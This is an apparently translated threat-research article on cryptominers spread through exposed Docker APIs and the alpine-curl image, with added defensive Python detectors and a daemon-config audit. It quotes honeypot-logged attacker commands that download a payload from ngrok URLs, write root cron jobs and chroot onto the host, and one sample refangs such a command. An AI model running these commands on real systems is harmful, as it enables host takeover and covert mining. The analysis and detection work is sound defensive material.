How the Docker API and public community images are used to distribute cryptocurrency miners


We analyzed data collected with the container honeypots we built to track threats, and found significant activity from unwanted or unauthorized cryptocurrency miners deployed as rogue containers using an image published by the community on Docker Hub. The image is used as part of a service that delivers malicious cryptocurrency miners.

In addition, network tools were installed for penetrating exposed neighbouring containers and applications.

We leave our honeypots as they are, that is, with default settings, without any security measures and without installing additional software. Note that Docker publishes recommendations for initial setup that avoid common mistakes and simple weaknesses. The honeypots used here are containers designed to detect attacks aimed at the containerization platform itself, not at the applications inside the containers.

The detected malicious activity is notable because it requires no vulnerabilities and does not depend on the Docker version. Finding a misconfigured, and therefore exposed, container host is all attackers need to compromise a large number of open servers.

An exposed Docker API lets a user run a wide range of commands, including listing the running containers, retrieving the logs of a specific container, starting, stopping (including forced stopping) and even creating a new container from a specified image with specified settings. The API has no authentication of its own: when the daemon listens on a TCP port without TLS client verification, anyone who can reach the port has the same control over the host as the root-owned daemon.

[Figure: on the left, the malware deployment scheme; on the right, the attacker's environment, which allows images to be rolled out remotely.]

[Figure: distribution by country of 3,762 open Docker APIs. Based on a Shodan search made on February 12, 2019.]

Attack chain and payload options

The malicious activity was not detected only with the help of honeypots. Shodan data show that the number of exposed Docker APIs (see the second figure) has grown since we investigated a misconfigured container used as a bridge for deploying Monero cryptocurrency mining software. In October of last year (2018; current data can be viewed via this link. Translator's note) there were only 856 open APIs.

Analysis of the honeypot logs showed that the use of the container image is combined with the use of ngrok, a tool for establishing secure tunnels or forwarding traffic from publicly reachable endpoints to specified addresses or resources (for example, localhost). This lets attackers generate URLs dynamically when delivering the payload to an exposed server. Below are excerpts from the logs showing abuse of the ngrok service:

Tty: false
Command: "-c curl --retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d "hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283";echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d" >/tmp9bedce/etc/crontab;echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d" >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c "cron || crond"",
Entrypoint: "/bin/sh"

Tty: false,
Command: "-c curl --retry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d "hxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283";echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d" >/tmp570547/etc/crontab;echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d" >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c "cron || crond"",
Entrypoint: "/bin/sh"

Tty: false,
Command: "-c curl --retry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed "hxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee";echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed" >/tmp326c80/etc/crontab;echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed" >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c "cron || crond"",
Entrypoint: "/bin/sh",

Tty: false,
Cmd: "-c curl --retry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed "hxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee";echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed" >/tmp8b9b5b/etc/crontab;echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed" >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c "cron || crond"",
Entrypoint: "/bin/sh"

As you can see, the files are downloaded from constantly changing URLs. These URLs are short-lived, so the payloads can no longer be downloaded after they expire. Note also the path prefix (/tmp9bedce, /tmp570547 and so on) under which the script writes /etc/crontab and /etc/cron.d/1m and then runs chroot: a container path containing the host's cron configuration is consistent with the host's root filesystem being bind-mounted into the container at that path, so the cron job runs as root on the host rather than inside the disposable container (the HostConfig of the create request is not shown in these excerpts).
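The entries above are the bodies of container-create requests, that is, the fields an exposed API accepts from any client. The following added example, written for this page and not part of the original article or the researchers' tooling, runs a simple detection over such request bodies: it flags ngrok download URLs, cron persistence, chroot, and bind mounts of the host's root filesystem, and correlates the last two into a single high-confidence finding. The sample requests are constructed from the first log excerpt (URL refanged, file hash shortened to HASH) and from a benign nginx deployment; the HostConfig bind mount in the sample is an assumption, since the excerpts do not show it.

```python
import re
from typing import Any, Dict, List

# Patterns taken from the honeypot log excerpts above.
NGROK_URL = re.compile(r"https?://[0-9a-f]{8}\.ngrok\.io/", re.IGNORECASE)
DOWNLOADER = re.compile(r"\b(?:curl|wget)\b")
# Redirection into the system crontab or a cron.d drop-in, capturing the full path.
CRON_WRITE = re.compile(r">\s*([^\s;]*/etc/(?:crontab|cron\.d/[^\s;]+))")
CHROOT = re.compile(r"\bchroot\s+(/[^\s;]+)")


def _as_list(value: Any) -> List[str]:
    """Cmd and Entrypoint may be given as a string or a list of strings."""
    if value is None:
        return []
    return [value] if isinstance(value, str) else list(value)


def host_root_mounts(req: Dict[str, Any]) -> List[str]:
    """Container paths at which the host's root filesystem is bind-mounted.

    HostConfig.Binds entries have the form host_path:container_path[:options].
    """
    mounts = []
    for bind in req.get("HostConfig", {}).get("Binds") or []:
        parts = bind.split(":")
        if len(parts) >= 2 and parts[0] == "/":
            mounts.append(parts[1])
    return mounts


def analyze_create_request(req: Dict[str, Any]) -> List[str]:
    """Return finding tags for one POST /containers/create body."""
    findings: List[str] = []
    script = " ".join(_as_list(req.get("Entrypoint")) + _as_list(req.get("Cmd")))
    roots = host_root_mounts(req)

    if roots:
        findings.append("host-root-bind")
    if req.get("HostConfig", {}).get("Privileged"):
        findings.append("privileged")
    if NGROK_URL.search(script):
        findings.append("ngrok-download")
    elif DOWNLOADER.search(script) and "://" in script:
        findings.append("remote-download")

    cron_targets = CRON_WRITE.findall(script)
    if cron_targets:
        findings.append("cron-persistence")
    chroot_targets = CHROOT.findall(script)
    if chroot_targets:
        findings.append("chroot")

    # Strongest signal: cron written to, or chroot into, a directory where host / is mounted.
    for root in roots:
        touches_host = any(t.startswith(root + "/") for t in cron_targets) or root in chroot_targets
        if touches_host:
            findings.append("host-escape-via-bind")
            break
    return findings


# Constructed from the first log excerpt above (URL refanged, file hash shortened to HASH).
SAMPLE_CREATE: Dict[str, Any] = {
    "Image": "alpine-curl",
    "Entrypoint": ["/bin/sh"],
    "Cmd": [
        "-c",
        'curl --retry 3 -m 60 -o /tmp9bedce/tmp/tmpfileHASH '
        '"http://12f414f1.ngrok.io/f/serve?l=d&r=HASH";'
        'echo "* * * * * root sh /tmp/tmpfileHASH" >/tmp9bedce/etc/crontab;'
        'echo "* * * * * root sh /tmp/tmpfileHASH" >/tmp9bedce/etc/cron.d/1m;'
        'chroot /tmp9bedce sh -c "cron || crond"',
    ],
    # Assumption: the excerpts omit HostConfig; the chroot target only makes sense
    # if the host's root filesystem is mounted there.
    "HostConfig": {"Binds": ["/:/tmp9bedce"]},
}

# Constructed benign request for comparison.
BENIGN_CREATE: Dict[str, Any] = {
    "Image": "nginx:1.25",
    "Cmd": ["nginx", "-g", "daemon off;"],
    "HostConfig": {"Binds": ["/srv/www:/usr/share/nginx/html:ro"]},
}


if __name__ == "__main__":
    for name, req in (("sample", SAMPLE_CREATE), ("benign", BENIGN_CREATE)):
        print(name, analyze_create_request(req) or "clean")
```

The same checks can be applied to the output of GET /containers/json (which returns the Command and the container's Mounts) to audit containers that already exist on a host.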

There are two payload options. The first is a compiled ELF miner for Linux (detected as Coinminer.SH.MALXMR.ATNO) that connects to a mining pool. The second is a script (TrojanSpy.SH.ZNETMAP.A) designed to fetch certain network tools, which are used to scan network ranges and then look for new targets.

The dropper script sets two variables that are then used to deploy the cryptocurrency miner. The HOST variable contains the URL where the malicious files are hosted, and the RIP variable contains the file name (in fact, the hash) of the miner to be deployed. The HOST variable changes every time the hash variable changes. The script also tries to make sure that no other cryptocurrency miners are running on the attacked server.

[Figure: examples of the HOST and RIP variables, and the code snippet used to check that no other miners are running.]

Before the miner is started, it is renamed to nginx. Other versions of this script rename the miner to other legitimate services found in Linux environments. This is commonly done to evade checks of the list of running processes.

The scanning script has its own features. It uses the same URL service to fetch the tools it needs. Among them is the zmap binary, used to scan networks and obtain a list of open ports. The script also fetches another binary used to interact with the discovered services and retrieve their banners, from which additional information about the discovered service (for example, its version) is determined.

The script also predefines some network ranges to scan, although this depends on the script version. It likewise sets the target ports of the services of interest, in this case Docker, before running the scan.

Once possible targets are found, their banners are retrieved. The script filters targets by the services, applications, components or platforms of interest: Redis, Jenkins, Drupal, MODX, Kubernetes Master, Docker 1.16 client and Apache CouchDB. If a scanned server matches any of them, it is saved to a text file that the attackers can use later for analysis and exploitation. These text files are uploaded to the attackers' servers via dynamic links, that is, a separate URL is used for each file, which makes subsequent access difficult.

The attack vector is a Docker image, as can be seen in the next two code fragments.

[Figure: above, the miner being renamed to a legitimate service; below, how zmap is used to scan networks.]

[Figure: above, the predefined network ranges; below, the ports specified for service discovery, including Docker.]

[Figure: the screenshot shows that the alpine-curl image has been pulled more than 10 million times.]

Based on Alpine Linux and curl, a resource-efficient command-line tool for transferring files over various protocols, one can build a Docker image. As the previous screenshot shows, this image has been pulled more than 10 million times. The large number of pulls may indicate that this image is used as an entry point; the image was updated more than six months ago, and users did not pull the other images from this repository as often. In Docker, the entry point is the set of instructions used to configure a container for running. If a deployment is configured incorrectly (for example, the container is left exposed to the Internet), the image can be used as an attack vector: attackers can use it to deliver a payload when they find a misconfigured or open container host. Note that in the log excerpts above the attacker does not rely on the image's own entry point at all: the create request overrides it with Entrypoint: "/bin/sh" and passes the whole dropper as the Cmd argument, so any image containing a shell and curl would serve the same purpose.

It is important to note that this image (alpine-curl) is not malicious in itself, but, as shown above, it can be used to carry out malicious actions. Similar Docker images can be used for malicious actions as well. We contacted Docker and worked with them on this issue.

Recommendations

Misconfiguration remains a constant problem for many companies, especially those adopting DevOps with its focus on rapid development and delivery. The problem is compounded by the need to comply with audit and monitoring requirements, the need to protect data confidentiality, and the heavy cost of failing to do so. Embedding security automation into the development lifecycle not only helps find security holes that would otherwise go unnoticed, but also reduces unnecessary work, such as running additional software builds for every vulnerability or misconfiguration discovered after an application has been deployed.

The incident discussed in this article shows the need to take security into account from the start, including the following recommendations:

  • For system administrators and developers: always check your API settings to make sure everything is configured to accept requests only from a specific server or from the internal network.
  • Follow the principle of least privilege: make sure container images are signed and verified, restrict access to critical components (the container runtime service) and add encryption to network connections.
  • Follow the recommendations and enable the security mechanisms, for example those from Docker and the built-in security features.
  • Use runtime and image scanning to get additional information about the processes running inside the container (for example, to detect spoofing or search for vulnerabilities). Application control and integrity monitoring help track abnormal changes to servers, files and system areas.
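The first two recommendations translate directly into the daemon configuration. The following added example (not from the article; both daemon.json fragments and the certificate paths are constructed) puts a weak configuration, a plaintext TCP listener on all interfaces, next to a hardened one that binds to an internal address and requires TLS client certificates, and audits either for the exposure pattern described above.

```python
import json
from typing import Any, Dict, List

# Constructed /etc/docker/daemon.json contents (not from the article).
# Weak: the conventional plaintext API port, reachable from every interface.
WEAK_DAEMON_JSON: Dict[str, Any] = {
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"],
}

# Hardened: internal address only, TLS with mandatory client certificates.
# The address and certificate paths are assumptions for the example.
HARDENED_DAEMON_JSON: Dict[str, Any] = {
    "hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"],
    "tls": True,
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
}


def audit_daemon_config(cfg: Dict[str, Any]) -> List[str]:
    """Return findings describing how the Engine API would be exposed by this config."""
    findings: List[str] = []
    tcp_hosts = [h for h in cfg.get("hosts", []) if h.startswith("tcp://")]
    if not tcp_hosts:
        return findings  # unix socket only: not reachable over the network

    if not cfg.get("tlsverify"):
        findings.append("tcp listener without tlsverify: any client that reaches the port has full control")
    else:
        for key in ("tlscacert", "tlscert", "tlskey"):
            if key not in cfg:
                findings.append(f"tlsverify set but {key} is missing")

    for h in tcp_hosts:
        # hosts entries look like tcp://ADDRESS:PORT; rpartition keeps IPv6 brackets intact.
        host, _, port = h[len("tcp://"):].rpartition(":")
        if host in ("", "0.0.0.0", "[::]"):
            findings.append(f"{h}: bound to all interfaces")
        if port == "2375":
            findings.append(f"{h}: port 2375 is the conventional plaintext API port")
    return findings


def render(cfg: Dict[str, Any]) -> str:
    """Serialize a config the way it would be written to daemon.json."""
    return json.dumps(cfg, indent=2)


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_DAEMON_JSON), ("hardened", HARDENED_DAEMON_JSON)):
        print(f"--- {name} ---\n{render(cfg)}")
        for finding in audit_daemon_config(cfg) or ["no findings"]:
            print("  *", finding)
```

Two caveats when applying this: on distributions whose docker.service unit already passes -H fd:// to dockerd, a hosts key in daemon.json conflicts with it and the daemon refuses to start, so the listener has to go into a systemd drop-in instead; and a TLS-protected listener is still an attack surface, so restrict it with host firewall rules in addition to client certificates.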

Trend Micro helps DevOps teams build securely, ship quickly and launch anywhere. Trend Micro Hybrid Cloud Security provides powerful, streamlined and automated security across an organization's DevOps pipeline and delivers multiple XGen threat defenses to protect physical, virtual and cloud workloads at runtime. It adds container security with Deep Security and Deep Security Smart Check, which scan Docker container images for malware and vulnerabilities at any point in the development pipeline to stop threats before they are deployed.

Indicators of compromise

Related hashes:

  • 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
  • f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)

In the Docker Video Course, practising instructors show which settings need to be made first in order to reduce the likelihood of, or avoid altogether, the situation described above. And on August 19-21, at the DevOps Tools & Cheats online intensive, you can discuss this and similar security problems with colleagues and practising instructors at a round table, where everyone can speak up and hear about the pains and successes of experienced peers.

Source: www.habr.com
